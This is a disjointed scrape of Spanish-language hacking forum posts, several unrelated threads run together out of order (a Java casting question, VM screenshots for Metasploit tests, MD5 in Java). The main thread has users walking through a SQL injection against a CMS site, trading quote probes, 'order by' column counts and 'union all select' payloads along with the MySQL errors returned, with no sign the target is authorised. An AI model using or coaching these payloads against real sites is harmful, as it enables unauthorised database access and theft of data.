Mensajes

Nada no lo consiguo creo que lo estoy yo mal porque tu respuesta tiene sentido pero cuando lo intento lo hago mal, estoy probando con esto

Código (java) [Seleccionar] Expandir


List<type> <name> = (List) new Persona();


es precisamente lo que no puedes hacer, como ya te he dicho el cast explicito es para objetos o datos similares por asi decirlo, si quiere convertirlo tendrás que crear un método que lo haga manualmente, osea pasando los datos de persona a un list de uno en uno, si es que persona es un almacenador de tipo vector.

Saludos

Hecha la ley, hecha la trampa, una vez se crea un sistema seguro, nunca es perfecto...

Saludos

Gracias por responder Debci pero a que te refieres que le haga la snap al area de monitor de la VM? y si lo tengo en vmware.

Pues que puedes sin dificultad algun hacerle una screenshot al area donde sale la shell del VMWare

Saludos

hi bro.
http://www.mipagina.com/articulo/'1
provaste con?
http://www.mipagina.com/articulo/1'
http://www.mipagina.com/articulo/'1''
te muestra el mismo resultado ? o te tira algun error al poner 2 comillas simples?

http://www.mipagina.com/articulo/1+and+1=1+order+by+99+--+

y con eso que te muestra?

He conseguido que con eso me devuelva:
CMS_GetContentIDByName: Unknown column '87' in 'order clause'

Por lo que hay mas tablas de las que sospechaba!
ES este codigo el que he usado:

Código [Seleccionar] Expandir

-1')+and+1=1+order+by+87+--+


Y con dos comillas suelta esto:
CMS_GetContentIDByName: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''') OR (url_rewrite = ''1''') LIMIT 1' at line 1
Codigo usado:

Código [Seleccionar] Expandir

'1''

Saludos

es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con

Código [Seleccionar] Expandir

')...

pueds probar a hacer:


-1') union all select 1,2,3,4,'n


fijate que la n lleva la comilla antes! en fin, prueba y postea!

Mira, si hago esto:

Código [Seleccionar] Expandir

-1')+union+all+select+1,2,3,4,'5--
Me devuelve:
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1
Sin embargo si pruebo con:

Código [Seleccionar] Expandir

-1')+union+all+select+1,2,3,'4,'5--
Da esto:
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5--')' at line 1

Por lo que sospecho que las comillas no estan situadas como me parecia :S

Saludos

Puedes utilizar la que hay por defecto en el API de java, muy muy completa, mira mi source sobre bruteforcing y verás que puedes cifrar MD5 en unos sencillos pasos, asi como SHA1 y otros muchos algoritmos de cifrado.

Saludos

prueba con

-1') union all select 1,2,3,4,n--

Bad response :/

CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Gracias por tu ayuda

Saludos

Hola muy buenas a todos, probando una SQLi he encontrado lo que parece ser un posible vector de ataque:

Código [Seleccionar] Expandir

http://www.mipagina.com/articulo/'1

CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1

Se supone que asi es vulnerable no?

Pero cuando intento hacer la injeción con esto:

Código [Seleccionar] Expandir

-1+union+select+1,2,3,n--

(Con n me refiero a que voy subiendo de tablas)
Al insertar el -1 se va el error y no aparece ninguna tabla tras probar hasta 20 (no creo que haya mas, sinceramente).

Es vulnerable o simplemente no la estoy atacando bien?

Saludos

Intentas hacer un cast explicito de un array a una clase persona, y los tipos no son validos, por eso no va bien.

Saludos

Yo esque estoy haciendo pruebas con metasploit y me gustaria hacer una scremshot y no se si funcionara.me gustaria hacer una scremshoy de un escritorio por ejemplo.

Si lo tienes en una maquina virtual no hay dificultad, le haces la snap al area de monitor de la VM.

Saludos